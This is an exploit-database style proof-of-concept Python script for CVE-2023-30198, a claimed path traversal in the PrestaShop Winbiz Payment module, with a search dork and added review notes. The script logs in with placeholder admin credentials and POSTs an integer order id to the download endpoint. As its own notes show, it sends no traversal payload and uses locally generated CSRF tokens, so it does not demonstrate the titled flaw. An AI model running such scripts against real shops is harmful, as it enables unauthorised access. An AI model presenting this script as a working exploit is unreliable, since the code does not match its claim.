# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

"""Proof-of-concept request sequence against the Winbiz Payment download endpoint.

What the script actually does, as written: it POSTs a fixed e-mail/password pair to
``/authentication.php``, then POSTs an integer ``id_order`` to
``/modules/winbizpayment/downloads/download.php`` and writes whatever body comes back
to ``/tmp/order_<id>.pdf``.

NOTE(review): the header classifies the issue as CWE-22 (path traversal), but no
request below carries a path-controlling value -- the only endpoint-specific
parameter sent is the integer ``id_order``. The script therefore only demonstrates
reaching the endpoint with an authenticated session, not the traversal itself.

NOTE(review): both ``csrf_token`` values are generated locally at random rather than
read back from the login page. If the server validates that token, both POSTs are
expected to be rejected; the script never checks a status code, so a rejection would
still be written to disk as if it were a PDF.

Defender's view: the relevant footprint is a POST to ``/authentication.php``
immediately followed by a POST to ``/modules/winbizpayment/downloads/download.php``
from the same session; the download endpoint is the component to patch or restrict.
"""

import requests
import string
import random

# The base URL of the vulnerable site.
# NOTE(review): plain http:// -- the admin credentials below are sent in cleartext.
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account (placeholders; the PoC assumes
# valid shop credentials are already known -- it does not bypass authentication).
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download (an integer; no path component is sent).
order_id = 1234

# The path to save the downloaded file.
# NOTE(review): fixed location under /tmp; the response body is written here
# unconditionally, whatever the server returned.
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests (filled in after login).
session_cookies: dict[str, str] | None = None

# Generate a random string for the CSRF token.
# NOTE(review): this token is not obtained from the server; it is 32 random
# uppercase letters/digits, so it cannot match any token the server issued.
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user.
# The response is not inspected; a failed login is not detected here.
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests.
# (Redundant with the Session object, which already carries its cookie jar.)
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token (same caveat as above).
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF.
# Only id_order and the locally generated csrf_token are sent.
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk.
# NOTE(review): no status-code or content-type check -- an error page or empty
# body is written with a .pdf name just the same.
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)